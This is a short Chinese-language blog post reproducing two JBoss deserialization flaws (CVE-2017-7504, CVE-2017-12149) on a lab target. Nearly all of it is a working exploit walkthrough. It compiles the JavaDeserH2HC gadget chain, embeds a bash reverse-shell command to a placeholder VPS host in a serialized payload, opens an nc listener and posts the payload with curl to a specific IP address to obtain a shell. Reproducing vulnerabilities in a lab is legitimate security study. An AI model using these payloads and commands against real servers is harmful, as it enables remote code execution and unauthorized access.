jboss反序列化漏洞复现
前言
最近参加某保险的安全攻防演练,发现攻击队利用JBOSS反序列化漏洞,成功getshell。趁着热乎劲,赶紧复现一下。漏洞描述
CVE-2017-7504
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
CVE-2017-12149
漏洞影响5.x和6.x版本的JBOSSAS。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。
靶场地址:http://vulfocus.fofa.so/#/dashboard
工具下载地址:https://github.com/joaomatosf/JavaDeserH2HC
复现过程
在VPS上分别执行以下命令:
javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java
java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/VPS/port 0>&1"
第一行命令执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.class
第二行命令执行完成后,将生成一个文件ExampleCommonsCollections1WithHashMap.ser

使用nc监听一个端口
nc -lvp port
将该文件作为body发送如下数据包:
curl http://118.193.36.37:63089/jbossmq-httpil/HTTPServerILServlet/ --data-binary @ExampleCommonsCollections1.ser
成功反弹Shell。


参考链接:https://www.cnblogs.com/iamver/p/11282928.html

浙公网安备 33010602011771号